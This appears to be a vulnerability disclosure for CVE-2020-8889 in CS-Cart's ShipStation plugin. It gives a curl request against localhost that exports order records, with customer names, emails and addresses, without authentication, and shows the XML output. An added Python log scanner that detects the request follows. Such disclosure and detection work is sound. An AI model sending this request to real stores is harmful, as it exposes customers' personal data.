Minimum requirements for CVE-2020-8889

Minimum requirements:

  1. Visit the home page of a CS-Cart store which has the ShipStation plugin 1.0 installed (previously available at https://ss7.shipstation.com/content/integration/CSCart/shipstation_cs-cart_1.0.5.zip but replaced with https://ss7.shipstation.com/content/integration/CSCart/shipstation_cs-cart_1.0.10.zip)
  2. Add the following query string parameters to the store's home page URL:
    • dispatch=shipstation
    • action=export
    • end_date=2050 (or any future year readable by PHP's strtotime() function)

Example via curl (assuming CS-Cart is installed at http://localhost):

$ curl 'http://localhost/?dispatch=shipstation&action=export&end_date=2050'
<?xml version="1.0" standalone="yes"?>
<Orders pages="2">
  <Order>
    <OrderID><![CDATA[28]]></OrderID>
    <OrderNumber><![CDATA[28]]></OrderNumber>
    <OrderDate><![CDATA[9/25/2013 23:01 PM]]></OrderDate>
    <OrderStatus><![CDATA[complete]]></OrderStatus>
    <LastModified><![CDATA[9/25/2013 23:01 PM]]></LastModified>
    <ShippingMethod><![CDATA[Custom shipping method]]></ShippingMethod>
    <PaymentMethod><![CDATA[1]]></PaymentMethod>
    <OrderTotal><![CDATA[917.99]]></OrderTotal>
    <TaxAmount><![CDATA[0]]></TaxAmount>
    <ShippingAmount><![CDATA[0.00]]></ShippingAmount>
    <CustomerNotes><![CDATA[]]></CustomerNotes>
    <InternalNotes><![CDATA[]]></InternalNotes>
    <Customer>
      <CustomerCode><![CDATA[[email protected]]]></CustomerCode>
      <BillTo>
        <Name><![CDATA[David Tenant]]></Name>
        <Company><![CDATA[]]></Company>
        <Phone><![CDATA[+55(55)5555-5555]]></Phone>
        <Email><![CDATA[[email protected]]]></Email>
      </BillTo>
      <ShipTo>
        <Name><![CDATA[David Tenant]]></Name>
        <Company><![CDATA[]]></Company>
        <Address1><![CDATA[Glasgow, Lanarkshire G2 1DS]]></Address1>
        <Address2><![CDATA[]]></Address2>
        <City><![CDATA[Glasgow]]></City>
        <State><![CDATA[GLAS]]></State>
        <PostalCode><![CDATA[141 332]]></PostalCode>
        <Country><![CDATA[GB]]></Country>
        <Phone><![CDATA[+55(55)5555-5555]]></Phone>
      </ShipTo>
    </Customer>
    <Items>
      <Item>
        <SKU><![CDATA[H0148VPS1T]]></SKU>
        <Name><![CDATA[16GB A Series Walkman Video MP3]]></Name>
        <ImageUrl><![CDATA[http://localhost/images/detailed/0/NWZA865BLK.jpg]]></ImageUrl>
        <Weight><![CDATA[0.000]]></Weight>
        <WeightUnits><![CDATA[lbs]]></WeightUnits>
        <Quantity><![CDATA[1]]></Quantity>
        <UnitPrice><![CDATA[219.00]]></UnitPrice>
        <Location><![CDATA[]]></Location>
      </Item>
    </Items>
  </Order>
</Orders>
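
A defender-side check for the request shown above, as an added example that is not part of the original page: it scans web-server access logs for the dispatch=shipstation / action=export query and flags successful responses sent to addresses outside an allowlist. The combined log format, the sample log lines, the function name find_export_requests and the trusted_ips allowlist are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the original page).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Feb/2020:10:01:22 +0000] "GET /?dispatch=shipstation&action=export&end_date=2050 HTTP/1.1" 200 1873 "-" "curl/7.68.0"
198.51.100.4 - - [12/Feb/2020:10:02:10 +0000] "GET /?dispatch=products.view&product_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Feb/2020:10:03:45 +0000] "GET /index.php?action=export&dispatch=shipstation&end_date=2050 HTTP/1.1" 200 902 "-" "-"
203.0.113.7 - - [12/Feb/2020:10:04:00 +0000] "GET /?dispatch=shipstation&action=export&end_date=2050 HTTP/1.1" 403 0 "-" "curl/7.68.0"
"""

# Client address, timestamp, request line, status and response size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_export_requests(log_text, trusted_ips=frozenset()):
    """Return one dict per logged request to the ShipStation export action."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        # parse_qs URL-decodes values; [-1] mirrors PHP keeping the last duplicate.
        dispatch = query.get("dispatch", [""])[-1].lower()
        action = query.get("action", [""])[-1].lower()
        if dispatch != "shipstation" or action != "export":
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": status,
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            "end_date": query.get("end_date", [None])[-1],
            # 2xx to an address outside the (hypothetical) allowlist: order XML was likely returned.
            "suspicious": m["ip"] not in trusted_ips and 200 <= status < 300,
        })
    return hits

if __name__ == "__main__":
    for hit in find_export_requests(SAMPLE_LOG, trusted_ips={"192.0.2.10"}):
        print(hit)
```

Only parameters sent in the URL appear in an access log, so the same parameters sent in a request body would not be seen by this check.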